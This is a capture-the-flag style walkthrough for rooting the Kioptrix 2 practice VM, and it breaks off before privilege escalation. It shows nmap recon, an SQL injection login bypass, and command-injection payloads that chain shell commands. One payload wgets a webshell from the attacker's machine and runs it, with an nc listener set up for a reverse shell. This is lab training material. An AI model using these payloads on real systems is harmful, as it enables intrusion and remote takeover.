Rooting Kioptrix 2 Walkthrough

Overview

Kioptrix 2 is B2R VM designed for students to practice vulnerability analysis and exploitation. Objective is to root this virtual machine by exploiting possible vulnerabilities leading to full system compromise

Lab Setup:

VMWare workstation for Virtual Machines
Kali Linux VM in Bridge mode
Kioptrix in Bridge mode

Tools Used:

Kali Linux VM
netdiscover
nmap

Vulnerabilities Exploited:

SQL Injection
Command Execution
Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root

Reconnaissance/ Scanning

#netdiscover

Target VM IP Address: 192.168.8.105

nmap -p- -A –webxml -oX nmap-kioptrix2.xml 192.168.8.105

Nmap findings:

Found website is running on port 80.

Exploitation:

Found sql injection in website.

“admin’ or 1=1 — -”

“garbag”

Found command execution. Our goal is to upload webshell. We need to find utility that will download our webshell, either wget, nc, etc… and a writable direcotyr.

127.0.0.1; pwd; ls -al; id; whereis wget

wget is available on server. We can use wget to download webshell over server. but we can not upload webshell in /var/ww/html? coz, this directory is owned by root, and everyone does not have access to write to this directory. No problem, we can use /tmp for webshell uploading with this command.

#127.0.0.1; wget 192.168.8.104/shell.txt -O /tmp/shell.php; php /tmp/shell.php

But before executing above command in lets configure webshell with reverse ip address to our kali linux machine and start web server as:

#service apache2 start

and also, nc listener

#nc -nvlp 1234